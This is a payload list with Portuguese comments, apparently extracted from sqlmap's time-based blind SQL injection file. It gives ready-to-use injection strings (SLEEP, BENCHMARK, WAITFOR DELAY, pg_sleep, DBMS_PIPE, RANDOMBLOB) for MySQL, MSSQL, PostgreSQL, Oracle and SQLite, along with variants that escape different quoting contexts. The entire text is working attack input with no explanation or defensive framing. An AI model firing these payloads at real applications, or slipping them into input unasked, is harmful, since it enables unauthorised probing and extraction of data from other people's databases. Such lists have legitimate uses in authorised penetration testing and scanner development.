# SQLMap Time-Based Blind Payloads — extraído de sqlmap/data/xml/payloads/time_blind.xml
# Payloads concretos prontos para uso (SLEEPTIME=4)
# MySQL >= 5.0.12
AND (SELECT * FROM (SELECT(SLEEP(4)))a)
OR (SELECT * FROM (SELECT(SLEEP(4)))a)
AND SLEEP(4)
OR SLEEP(4)
AND (SELECT * FROM (SELECT(SLEEP(4-(IF(1=1,0,4)))))a)
' AND (SELECT * FROM (SELECT(SLEEP(4)))a) AND '1'='1
' OR (SELECT * FROM (SELECT(SLEEP(4)))a) AND '1'='1
') AND (SELECT * FROM (SELECT(SLEEP(4)))a) AND ('1'='1
" AND (SELECT * FROM (SELECT(SLEEP(4)))a) AND "1"="1
1) AND SLEEP(4) AND (1=1
# MySQL < 5.0.12 (BENCHMARK)
AND 1=BENCHMARK(4000000,MD5('test'))
OR 1=BENCHMARK(4000000,MD5('test'))
# MySQL RLIKE
RLIKE SLEEP(4)
RLIKE (SELECT * FROM (SELECT(SLEEP(4)))a)
# MSSQL
; WAITFOR DELAY '0:0:4'--
'); WAITFOR DELAY '0:0:4'--
'; WAITFOR DELAY '0:0:4'--
1; WAITFOR DELAY '0:0:4'--
1); WAITFOR DELAY '0:0:4'--
1' WAITFOR DELAY '0:0:4'--
# PostgreSQL
; SELECT pg_sleep(4)--
'; SELECT pg_sleep(4)--
'); SELECT pg_sleep(4)--
AND 1=(SELECT 1 FROM pg_sleep(4))
' AND 1=(SELECT 1 FROM pg_sleep(4)) AND '1'='1
# Oracle
AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',4)
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',4) AND '1'='1
AND 1=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
# SQLite
AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))
' AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2)))) AND '1'='1
# Boundaries — payloads com diferentes contextos SQL
) AND SLEEP(4) AND (1=1
)) AND SLEEP(4) AND ((1=1
))) AND SLEEP(4) AND (((1=1
' AND SLEEP(4) AND '1'='1
') AND SLEEP(4) AND ('1'='1
')) AND SLEEP(4) AND (('1'='1
" AND SLEEP(4) AND "1"="1
") AND SLEEP(4) AND ("1"="1
